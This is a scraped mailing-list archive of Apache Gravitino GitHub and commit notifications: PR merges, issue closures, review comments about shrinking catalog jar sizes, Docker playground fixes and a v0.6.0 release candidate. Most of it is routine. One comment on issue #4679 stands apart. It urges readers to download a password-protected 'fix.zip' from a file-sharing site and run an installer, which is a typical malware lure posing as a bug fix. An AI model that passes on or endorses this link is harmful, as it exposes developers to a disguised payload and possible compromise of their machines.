FANNG1 closed issue #4584: [Improvement] Support loading custom catalog as
backend in Gravitino Iceberg catalog
URL: https://github.com/apache/gravitino/issues/4584
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL
mchades commented on code in PR #4651:
URL: https://github.com/apache/gravitino/pull/4651#discussion_r1730787866
##
catalogs/catalog-kafka/src/main/java/org/apache/gravitino/catalog/kafka/KafkaCatalogPropertiesMetadata.java:
##
@@ -30,13 +30,17 @@ public class KafkaCatalogProper
beryllw closed pull request #66: [Bug] Avoid OOM (Out of Memory) for
Playground-gravitino
URL: https://github.com/apache/gravitino-playground/pull/66
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to
beryllw commented on PR #66:
URL:
https://github.com/apache/gravitino-playground/pull/66#issuecomment-2309499660
> 1. In which case you will get the OOM error?
Use gravitino-playground default config and refresh the gravitino homepage
several times, I couldn't reproduce this time.
jerryshao merged PR #4651:
URL: https://github.com/apache/gravitino/pull/4651
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@gravit
This is an automated email from the ASF dual-hosted git repository.
jshao pushed a commit to branch main
in repository https://gitbox.apache.org/repos/asf/gravitino.git
The following commit(s) were added to refs/heads/main by this push:
new 37952857a [#4662] improve(IT): Add ranger authoriz
FANNG1 opened a new pull request, #4676:
URL: https://github.com/apache/gravitino/pull/4676
### What changes were proposed in this pull request?
(Please outline the changes and how this PR fixes the issue.)
### Why are the changes needed?
(Please clarify why the c
xunliu opened a new pull request, #4677:
URL: https://github.com/apache/gravitino/pull/4677
### What changes were proposed in this pull request?
1. Use an isolated class loader to create an authorization Ranger plugin.
2. Add authorization for Hive E2E tests using Ranger via Graviti
FANNG1 closed pull request #4676: TEST
URL: https://github.com/apache/gravitino/pull/4676
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubs
seeronline commented on issue #4679:
URL: https://github.com/apache/gravitino/issues/4679#issuecomment-2309587824
Download
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
--
This is an automated message from the
FANNG1 closed pull request #4676: TEST
URL: https://github.com/apache/gravitino/pull/4676
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubs
diqiu50 opened a new issue, #4681:
URL: https://github.com/apache/gravitino/issues/4681
### Describe the feature
The catalog properties may store some sensitive data, like MySQL passwords
and AWS secret keys, which need to be encrypted.
### Motivation
_No response_
xunliu commented on PR #4677:
URL: https://github.com/apache/gravitino/pull/4677#issuecomment-2309630616
@yuqi1129 @jerryshao Please help me review this PR, Thanks.
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
U
theoryxu commented on PR #4680:
URL: https://github.com/apache/gravitino/pull/4680#issuecomment-2309628544
In my case, I can reuse the JDBC catalog configurations for my custom
catalog, but this approach doesn't cover other custom catalogs.
Now, we need to enumerate all configuration
jerryshao merged PR #4677:
URL: https://github.com/apache/gravitino/pull/4677
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@gravit
This is an automated email from the ASF dual-hosted git repository.
jshao pushed a commit to branch branch-0.6
in repository https://gitbox.apache.org/repos/asf/gravitino.git
The following commit(s) were added to refs/heads/branch-0.6 by this push:
new d3f26c63a [#4662] improve(IT): Add ran
jerryshao commented on code in PR #4670:
URL: https://github.com/apache/gravitino/pull/4670#discussion_r1730948197
##
NOTICE:
##
@@ -4,8 +4,10 @@ Copyright 2024 The Apache Software Foundation
This product includes software developed at
The Apache Software Foundation (http://ww
This is an automated email from the ASF dual-hosted git repository.
jshao pushed a change to tag v0.6.0-incubating-rc3
in repository https://gitbox.apache.org/repos/asf/gravitino.git
at 0962ba6fb (commit)
This tag includes the following new commits:
new 0962ba6fb Preparing Gravitino
This is an automated email from the ASF dual-hosted git repository.
jshao pushed a commit to branch branch-0.6
in repository https://gitbox.apache.org/repos/asf/gravitino.git
commit 8518bbe10bdd4589639b093436e9e5cfc0fd97d9
Author: Jerry Shao
AuthorDate: Mon Aug 26 17:15:52 2024 +0800
Prepar
This is an automated email from the ASF dual-hosted git repository.
jshao pushed a commit to tag v0.6.0-incubating-rc3
in repository https://gitbox.apache.org/repos/asf/gravitino.git
commit 0962ba6fb44567b34080ede4c5ac6fb567829654
Author: Jerry Shao
AuthorDate: Mon Aug 26 17:15:52 2024 +0800
This is an automated email from the ASF dual-hosted git repository.
jshao pushed a change to branch branch-0.6
in repository https://gitbox.apache.org/repos/asf/gravitino.git
from d3f26c63a [#4662] improve(IT): Add ranger authorization Hive E2E test
(#4677)
add 0962ba6fb Preparing Grav
Author: jshao
Date: Mon Aug 26 09:26:06 2024
New Revision: 71098
Log:
Apache Gravitino v0.6.0-incubating-rc3
Added:
dev/incubator/gravitino/v0.6.0-incubating-rc3/
dev/incubator/gravitino/v0.6.0-incubating-rc3/apache_gravitino-0.6.0.tar.gz
(with props)
dev/incubator/gravitino/v0.6.
mchades closed pull request #4682: remove integration-test module
URL: https://github.com/apache/gravitino/pull/4682
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscr
jerryshao commented on code in PR #4521:
URL: https://github.com/apache/gravitino/pull/4521#discussion_r1730980572
##
catalogs/catalog-jdbc-mysql/build.gradle.kts:
##
@@ -25,30 +25,36 @@ plugins {
}
dependencies {
- implementation(project(":api"))
- implementation(project(
yuqi1129 opened a new pull request, #4683:
URL: https://github.com/apache/gravitino/pull/4683
### What changes were proposed in this pull request?
(Please outline the changes and how this PR fixes the issue.)
### Why are the changes needed?
(Please clarify why the
FANNG1 commented on PR #4680:
URL: https://github.com/apache/gravitino/pull/4680#issuecomment-2309790657
> In my case, I can reuse the JDBC catalog configurations for my custom
catalog, but this approach doesn't cover other custom catalogs.
>
> Now, we need to enumerate all configurat
yuqi1129 commented on code in PR #4521:
URL: https://github.com/apache/gravitino/pull/4521#discussion_r1730997605
##
catalogs/catalog-jdbc-mysql/build.gradle.kts:
##
@@ -25,30 +25,36 @@ plugins {
}
dependencies {
- implementation(project(":api"))
- implementation(project("
yuqi1129 commented on code in PR #4521:
URL: https://github.com/apache/gravitino/pull/4521#discussion_r1731002080
##
catalogs/catalog-jdbc-mysql/build.gradle.kts:
##
@@ -25,30 +25,36 @@ plugins {
}
dependencies {
- implementation(project(":api"))
- implementation(project("
mchades opened a new pull request, #4684:
URL: https://github.com/apache/gravitino/pull/4684
### What changes were proposed in this pull request?
make catalog property metadata automatically add
### Why are the changes needed?
catalog developer can now focus on the defini
jerryshao commented on PR #4668:
URL: https://github.com/apache/gravitino/pull/4668#issuecomment-2309928060
Hi @manoharbvk Thanks for your contribution. Would you follow our PR title
and description template to update them?
Also you can follow this commit
(https://github.com/apache/g
jerryshao closed issue #4520: [Improvement] Shrink JDBC catalog binary package
size.
URL: https://github.com/apache/gravitino/issues/4520
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific
jerryshao closed issue #4520: [Improvement] Shrink JDBC catalog binary package
size.
URL: https://github.com/apache/gravitino/issues/4520
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific
jerryshao merged PR #4521:
URL: https://github.com/apache/gravitino/pull/4521
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@gravit
This is an automated email from the ASF dual-hosted git repository.
jshao pushed a commit to branch main
in repository https://gitbox.apache.org/repos/asf/gravitino.git
The following commit(s) were added to refs/heads/main by this push:
new 0af3353fb [#4520] Imporvement(jdbc-catalogs): Shri
jerryshao commented on PR #4531:
URL: https://github.com/apache/gravitino/pull/4531#issuecomment-2309945374
Can you please list all the jars after you excluded @mchades?
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use
jerryshao commented on PR #4535:
URL: https://github.com/apache/gravitino/pull/4535#issuecomment-2309948129
@yuqi1129 , can you please all the jars are you excluded?
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
LauraXia123 opened a new issue, #4685:
URL: https://github.com/apache/gravitino/issues/4685
### Version
main branch
### Describe what's wrong
Setting inline styles in my React application. In this case, for a img
`https://analytics.apache.org/matomo.php?idsite=62&rec=1
jerryshao commented on PR #4532:
URL: https://github.com/apache/gravitino/pull/4532#issuecomment-2309963382
Can you please list all the jars after you excluded, @mchades ?
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and us
LauraXia123 opened a new pull request, #4686:
URL: https://github.com/apache/gravitino/pull/4686
### What changes were proposed in this pull request?
make sure to set inline styles in my React application for img
### Why are the changes needed?
N/A
Fix: #4685
This is an automated email from the ASF dual-hosted git repository.
jshao pushed a commit to branch main
in repository https://gitbox.apache.org/repos/asf/gravitino.git
The following commit(s) were added to refs/heads/main by this push:
new 8fc8ea970 [#4685] fix docs img inline style issue
jerryshao closed issue #4685: [Bug report] React inline style - style prop
expects a mapping from style properties to values, not a string
URL: https://github.com/apache/gravitino/issues/4685
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on
This is an automated email from the ASF dual-hosted git repository.
github-bot pushed a change to branch
cherry-pick-branch-0.6-8fc8ea9707c01c32ab059c168726c97dc2d34dca
in repository https://gitbox.apache.org/repos/asf/gravitino.git
at 660671b88 [#4685] fix docs img inline style issue (#4
jerryshao closed issue #4685: [Bug report] React inline style - style prop
expects a mapping from style properties to values, not a string
URL: https://github.com/apache/gravitino/issues/4685
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on
jerryshao merged PR #4686:
URL: https://github.com/apache/gravitino/pull/4686
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@gravit
github-actions[bot] opened a new pull request, #4687:
URL: https://github.com/apache/gravitino/pull/4687
### What changes were proposed in this pull request?
make sure to set inline styles in my React application for img and show the
content of docs
https://github.com/user-atta
jerryshao closed pull request #4687: [#4685] fix docs img inline style issue
URL: https://github.com/apache/gravitino/pull/4687
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
jerryshao commented on code in PR #4611:
URL: https://github.com/apache/gravitino/pull/4611#discussion_r1731116809
##
core/src/main/java/org/apache/gravitino/storage/relational/mapper/CatalogMetaPGProvider.java:
##
@@ -0,0 +1,21 @@
+/*
+ * Licensed to the Apache Software Foundat
jerryshao commented on PR #4611:
URL: https://github.com/apache/gravitino/pull/4611#issuecomment-2310002380
I'm OK with the current solution, you can go ahead, @yuqi1129
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use
jerryshao merged PR #4687:
URL: https://github.com/apache/gravitino/pull/4687
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@gravit
This is an automated email from the ASF dual-hosted git repository.
jshao pushed a commit to branch branch-0.6
in repository https://gitbox.apache.org/repos/asf/gravitino.git
The following commit(s) were added to refs/heads/branch-0.6 by this push:
new e044eda50 [#4685] fix docs img inline
This is an automated email from the ASF dual-hosted git repository.
jshao pushed a change to branch
cherry-pick-branch-0.6-8fc8ea9707c01c32ab059c168726c97dc2d34dca
in repository https://gitbox.apache.org/repos/asf/gravitino.git
was 660671b88 [#4685] fix docs img inline style issue (#4686)
This is an automated email from the ASF dual-hosted git repository.
jshao pushed a commit to branch branch-0.6
in repository https://gitbox.apache.org/repos/asf/gravitino.git
The following commit(s) were added to refs/heads/branch-0.6 by this push:
new f45993393 [Minor] improvement(CI): Fix
jerryshao merged PR #4674:
URL: https://github.com/apache/gravitino/pull/4674
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@gravit
jerryshao merged PR #4619:
URL: https://github.com/apache/gravitino/pull/4619
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@gravit
jerryshao closed issue #4606: [Improvement] Possible null pointer
expection/code improvement in CatalogRegister.java
URL: https://github.com/apache/gravitino/issues/4606
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
This is an automated email from the ASF dual-hosted git repository.
jshao pushed a commit to branch main
in repository https://gitbox.apache.org/repos/asf/gravitino.git
The following commit(s) were added to refs/heads/main by this push:
new 1266b79e6 [#4606] Improvement(trino-connector): Po
jerryshao closed issue #4606: [Improvement] Possible null pointer
expection/code improvement in CatalogRegister.java
URL: https://github.com/apache/gravitino/issues/4606
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
diqiu50 opened a new issue, #4688:
URL: https://github.com/apache/gravitino/issues/4688
### Version
main branch
### Describe what's wrong
An error occurs during the Docker startup in the Trino playground Docker
image.
### Error message and/or stacktrace
pla
mchades commented on PR #4532:
URL: https://github.com/apache/gravitino/pull/4532#issuecomment-2310054407
@jerryshao FYI
before:
https://github.com/user-attachments/assets/30932c2a-7ff4-480d-b075-26575c8f8742";>
https://github.com/user-attachments/assets/4deb60ca-b42c-47f8-aae3-f919a
mchades commented on PR #4531:
URL: https://github.com/apache/gravitino/pull/4531#issuecomment-2310059487
@jerryshao FYI:
before:
https://github.com/user-attachments/assets/52474e46-3344-4e2b-9c6d-8005a242d673";>
https://github.com/user-attachments/assets/59e021ce-e821-4d5b-827a-5507
diqiu50 opened a new pull request, #4689:
URL: https://github.com/apache/gravitino/pull/4689
### What changes were proposed in this pull request?
Fix the Trino playground Docker image cannot start up
### Why are the changes needed?
Fix: #4688
### Does this PR intr
jerryshao closed pull request #4532: [#4530] improvement(kafka-catalog): reduce
kafka catalog libs size from 91MB to 17MB
URL: https://github.com/apache/gravitino/pull/4532
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use
jerryshao commented on PR #4532:
URL: https://github.com/apache/gravitino/pull/4532#issuecomment-2310066146
Do we need to exclude runtime guava and slf4j jars like @yuqi1129 did for
jdbc catalog? I think our base classloader already provided these jars.
--
This is an automated message fro
diqiu50 commented on code in PR #4689:
URL: https://github.com/apache/gravitino/pull/4689#discussion_r1731157146
##
dev/docker/trino/Dockerfile:
##
@@ -66,13 +66,15 @@ COPY --chown=trino:trino
packages/gravitino-trino-connector/postgresql-42.7.0.ja
RUN mkdir /tmp/gravitino
CO
jerqi opened a new pull request, #4690:
URL: https://github.com/apache/gravitino/pull/4690
### What changes were proposed in this pull request?
Supports to load fileds lazily.
### Why are the changes needed?
Fix: #4608
### Does this PR introduce _any_ user-facing c
mchades commented on code in PR #4628:
URL: https://github.com/apache/gravitino/pull/4628#discussion_r1731214672
##
.github/workflows/trino-integration-test.yml:
##
@@ -0,0 +1,104 @@
+name: Trino Integration Test
+
+# Controls when the workflow will run
+on:
+ # Triggers the wo
yuqi1129 closed issue #4688: [Bug report] The Trino playground Docker image
cannot start up.
URL: https://github.com/apache/gravitino/issues/4688
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the
yuqi1129 closed issue #4688: [Bug report] The Trino playground Docker image
cannot start up.
URL: https://github.com/apache/gravitino/issues/4688
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the
This is an automated email from the ASF dual-hosted git repository.
yuqi4733 pushed a commit to branch main
in repository https://gitbox.apache.org/repos/asf/gravitino.git
The following commit(s) were added to refs/heads/main by this push:
new 67d0cf5cb [#4688] fix (docker): Fix the Trino p
yuqi1129 merged PR #4689:
URL: https://github.com/apache/gravitino/pull/4689
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@graviti
This is an automated email from the ASF dual-hosted git repository.
github-bot pushed a change to branch
cherry-pick-branch-0.6-67d0cf5cb99dcfef5ac1c4ff30807c81ca0c8f35
in repository https://gitbox.apache.org/repos/asf/gravitino.git
at 81d43f688 [#4688] fix (docker): Fix the Trino playgro
github-actions[bot] opened a new pull request, #4691:
URL: https://github.com/apache/gravitino/pull/4691
### What changes were proposed in this pull request?
Fix the Trino playground Docker image cannot start up
### Why are the changes needed?
Fix: #4688
### Does
jerryshao closed pull request #4691: [#4688] fix (docker): Fix the Trino
playground Docker image cannot start up
URL: https://github.com/apache/gravitino/pull/4691
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL a
jerryshao closed issue #4662: [Subtask] Add ranger authorization Hive E2E test
URL: https://github.com/apache/gravitino/issues/4662
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific commen
caican00 commented on issue #2404:
URL: https://github.com/apache/gravitino/issues/2404#issuecomment-2310384208
> @caican00, you could create subtasks for this issue to make other
contributors have chance to contribute.
got it.
--
This is an automated message from the Apache Git Se
yuqi1129 commented on PR #4535:
URL: https://github.com/apache/gravitino/pull/4535#issuecomment-2310414783
> @yuqi1129 , can you please list all the jars are you excluded?
Yeah.
The following picture are all jars after optimization.
: Fix bugs in publ
yuqi1129 closed pull request #4693: [Minor] fix(docker-image): Fix bugs in
publishing Iceberg rest server docker image
URL: https://github.com/apache/gravitino/pull/4693
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
yuqi1129 merged PR #4692:
URL: https://github.com/apache/gravitino/pull/4692
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@graviti
This is an automated email from the ASF dual-hosted git repository.
yuqi4733 pushed a commit to branch main
in repository https://gitbox.apache.org/repos/asf/gravitino.git
The following commit(s) were added to refs/heads/main by this push:
new 2ac2f3a66 [Minor] fix(docker-image): Fix bugs i
yuqi1129 merged PR #4693:
URL: https://github.com/apache/gravitino/pull/4693
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@graviti
This is an automated email from the ASF dual-hosted git repository.
yuqi4733 pushed a commit to branch branch-0.6
in repository https://gitbox.apache.org/repos/asf/gravitino.git
The following commit(s) were added to refs/heads/branch-0.6 by this push:
new 45cb8035b [Minor] fix(docker-image)
This is an automated email from the ASF dual-hosted git repository.
yuqi4733 pushed a change to branch
cherry-pick-branch-0.6-2ac2f3a6649f0504e6d37e7ca1e7cbc868fe61ac
in repository https://gitbox.apache.org/repos/asf/gravitino.git
was eb6b10699 [Minor] fix(docker-image): Fix bugs in publis
This is an automated email from the ASF dual-hosted git repository.
yuqi4733 pushed a change to branch
cherry-pick-branch-0.6-67d0cf5cb99dcfef5ac1c4ff30807c81ca0c8f35
in repository https://gitbox.apache.org/repos/asf/gravitino.git
was 81d43f688 [#4688] fix (docker): Fix the Trino playgroun
yuqi1129 merged PR #4691:
URL: https://github.com/apache/gravitino/pull/4691
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@graviti
This is an automated email from the ASF dual-hosted git repository.
yuqi4733 pushed a commit to branch branch-0.6
in repository https://gitbox.apache.org/repos/asf/gravitino.git
The following commit(s) were added to refs/heads/branch-0.6 by this push:
new 1430ce10a [#4688] fix (docker): Fix
jerryshao commented on PR #4690:
URL: https://github.com/apache/gravitino/pull/4690#issuecomment-2311390704
I will wait this after the 0.6.0 release.
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go
yuqi1129 commented on PR #4693:
URL: https://github.com/apache/gravitino/pull/4693#issuecomment-2311392795
@diqiu50
Can you please leave a comment here so I can assign this PR to you.
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on
mchades commented on PR #4532:
URL: https://github.com/apache/gravitino/pull/4532#issuecomment-2311415971
> Do we need to exclude runtime guava and slf4j jars like @yuqi1129 did for
jdbc catalog? I think our base classloader already provided these jars.
fixed
--
This is an automate
jerryshao commented on PR #4670:
URL: https://github.com/apache/gravitino/pull/4670#issuecomment-2311439069
@JunpingDu @justinmclean please help to review again.
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL
jerryshao closed issue #4530: [Subtask] Shrink Kafka catalog binary package size
URL: https://github.com/apache/gravitino/issues/4530
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comm
jerryshao merged PR #4532:
URL: https://github.com/apache/gravitino/pull/4532
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscr...@gravit
jerryshao closed issue #4530: [Subtask] Shrink Kafka catalog binary package size
URL: https://github.com/apache/gravitino/issues/4530
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comm
This is an automated email from the ASF dual-hosted git repository.
jshao pushed a commit to branch main
in repository https://gitbox.apache.org/repos/asf/gravitino.git
The following commit(s) were added to refs/heads/main by this push:
new ff9405c52 [#4530] improvement(kafka-catalog): redu
jerryshao commented on PR #4531:
URL: https://github.com/apache/gravitino/pull/4531#issuecomment-2311450212
I'm definitely sure that there're many libs from Hive can be excluded, like
llap, so please carefully check them one by one.
--
This is an automated message from the Apache Git Serv
mchades commented on PR #4531:
URL: https://github.com/apache/gravitino/pull/4531#issuecomment-2311452744
> I'm definitely sure that there're many libs from Hive can be excluded,
like llap, so please carefully check them one by one.
I have excluded llap before, but encountered an erro
jerryshao commented on PR #4535:
URL: https://github.com/apache/gravitino/pull/4535#issuecomment-2311453581
I guess some jars like jetty may not be needed, maybe we can also exclude
them.
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on
yuqi1129 commented on PR #4535:
URL: https://github.com/apache/gravitino/pull/4535#issuecomment-2311455006
> I guess some jars like jetty may not be needed, maybe we can also exclude
them.
Okay, let me give it a try.
--
This is an automated message from the Apache Git Service.
1 - 100 of 146 matches
Mail list logo